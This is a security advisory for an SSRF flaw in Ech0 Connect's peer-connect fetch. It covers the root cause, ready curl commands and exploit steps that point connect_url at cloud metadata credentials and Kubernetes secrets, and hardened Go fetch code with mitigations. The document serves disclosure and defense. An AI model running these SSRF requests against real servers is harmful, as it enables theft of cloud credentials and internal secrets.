Ech0 Connect, SSRF, CVE(unknown) (High)


The vulnerability exists in the `fetchPeerConnectInfo` function in `internal/service/connect/connect.go` (lines 214-239). The function builds a URL by calling `httpUtil.TrimURL(peerConnectURL)` and appending `/api/connect`, then calls `httpUtil.SendRequest` to perform a GET request. Unlike `SendSafeRequest` (defined in `internal/util/http/http.go:228-281`), which enforces `ValidatePublicHTTPURL` to block private IP ranges and internal metadata endpoints, `SendRequest` performs no URL validation and has no SSRF protection. An authenticated attacker can therefore supply a `connect_url` value pointing at internal addresses such as the cloud metadata service (169.254.169.254), the in-cluster Kubernetes API, or other loopback or private-range services. The vulnerable function is called from two places: line 307 during connection processing (`fetchPeerConnectInfo(conn.ConnectURL, requestTimeout)`) and line 498 during health probing (`fetchPeerConnectInfo(conn.ConnectURL, healthProbeTimeout)`). By first creating a connection with a crafted `connect_url` via `POST /api/connects` and then triggering a health check via `GET /api/connects/health`, the attacker makes the server issue an outbound request to the chosen internal target. The response can leak sensitive information such as AWS instance identifiers, Kubernetes secrets, or other internal service output. The impact is a full SSRF (CWE-918), giving unauthorized access to internal network resources.

dailycve form:

Platform: Ech0 Connect
Version: unspecified
Vulnerability: SSRF (CWE-918)
Severity: High
Date: unknown

Prediction: 2024-12-15

What Undercode Say:

```shell
# Extract internal metadata via SSRF
curl -X POST "https://target.com/api/connects" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"connect_url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'

# Trigger request - returns AWS credentials
curl -H "Authorization: Bearer $TOKEN" \
  "https://target.com/api/connects/health"

# Kubernetes API probe
curl -X POST "https://target.com/api/connects" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"connect_url": "https://kubernetes.default.svc/api/v1/secrets"}'
```

Exploit:

1. Authenticate and obtain a valid Bearer token.
2. Send POST to `/api/connects` with `connect_url` set to an internal target (e.g., `http://169.254.169.254/latest/meta-data/`).
3. Send GET to `/api/connects/health`; the server fetches the internal URL and returns its response.
4. Read cloud metadata, internal APIs, or Kubernetes secrets from the response.

Protection from this CVE:

Replace `httpUtil.SendRequest` with `httpUtil.SendSafeRequest` in `fetchPeerConnectInfo`. Ensure `ValidatePublicHTTPURL` rejects private IPs (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 127.0.0.0/8, 169.254.0.0/16). Add an allowlist for the external domains that are actually required. Disable HTTP redirects so a permitted host cannot redirect the request to an internal one. Deploy network egress filtering at the firewall level.
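
A hardened outbound fetch path, written here as an added example and not Ech0's own code (the names `isBlockedIP`, `validatePublicHTTPURL` and `newSafeClient` are assumptions modelled on the `ValidatePublicHTTPURL` check the advisory names). It rejects non-http(s) schemes and blocked IP literals at input time, refuses redirects, and re-checks the peer address after DNS resolution at dial time, so a hostname that resolves to an internal address (or changes its answer between validation and connect) is still blocked.

```go
package main

import (
	"context"
	"fmt"
	"net"
	"net/http"
	"net/url"
)

// Loopback, link-local (169.254.0.0/16 holds the cloud metadata service),
// multicast, unspecified and RFC 1918/ULA private addresses are never fetched.
func isBlockedIP(ip net.IP) bool {
	return !ip.IsGlobalUnicast() || ip.IsPrivate()
}

// validatePublicHTTPURL is the input-time check SendRequest skips: http/https only,
// a host present, no blocked IP literal. Hostnames are enforced at dial time below.
func validatePublicHTTPURL(raw string) error {
	u, err := url.Parse(raw)
	if err != nil {
		return err
	}
	host := u.Hostname()
	if (u.Scheme != "http" && u.Scheme != "https") || host == "" {
		return fmt.Errorf("refusing %q: need http(s) scheme and a host", raw)
	}
	if ip := net.ParseIP(host); ip != nil && isBlockedIP(ip) {
		return fmt.Errorf("refusing %q: %s is not a public address", raw, ip)
	}
	return nil
}

// newSafeClient refuses redirects (a public host could 302 to the metadata IP) and
// checks the peer address after dialing, so DNS rebinding cannot bypass the check.
func newSafeClient() *http.Client {
	dial := func(ctx context.Context, nw, addr string) (net.Conn, error) {
		c, err := (&net.Dialer{}).DialContext(ctx, nw, addr)
		if err != nil {
			return nil, err
		}
		if ta, ok := c.RemoteAddr().(*net.TCPAddr); !ok || isBlockedIP(ta.IP) {
			c.Close()
			return nil, fmt.Errorf("connection to %s blocked", c.RemoteAddr())
		}
		return c, nil
	}
	return &http.Client{Transport: &http.Transport{DialContext: dial},
		CheckRedirect: func(*http.Request, []*http.Request) error { return http.ErrUseLastResponse }}
}
```

Call `validatePublicHTTPURL` on `connect_url` when the connection is created and use `newSafeClient()` for the fetch itself; the dial-time check is the one that matters for hostnames.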

Impact:

  • Confidentiality: Leak cloud metadata (AWS IMDSv1, GCE metadata, Azure instance metadata), Kubernetes API tokens, internal configuration endpoints.
  • Integrity: Low (no direct modification but can chain with other internal services).
  • Availability: Low (may cause denial of service via internal resource exhaustion).
  • Attack vector: Authenticated user, network access to the service.


Sources:

Reported By: github.com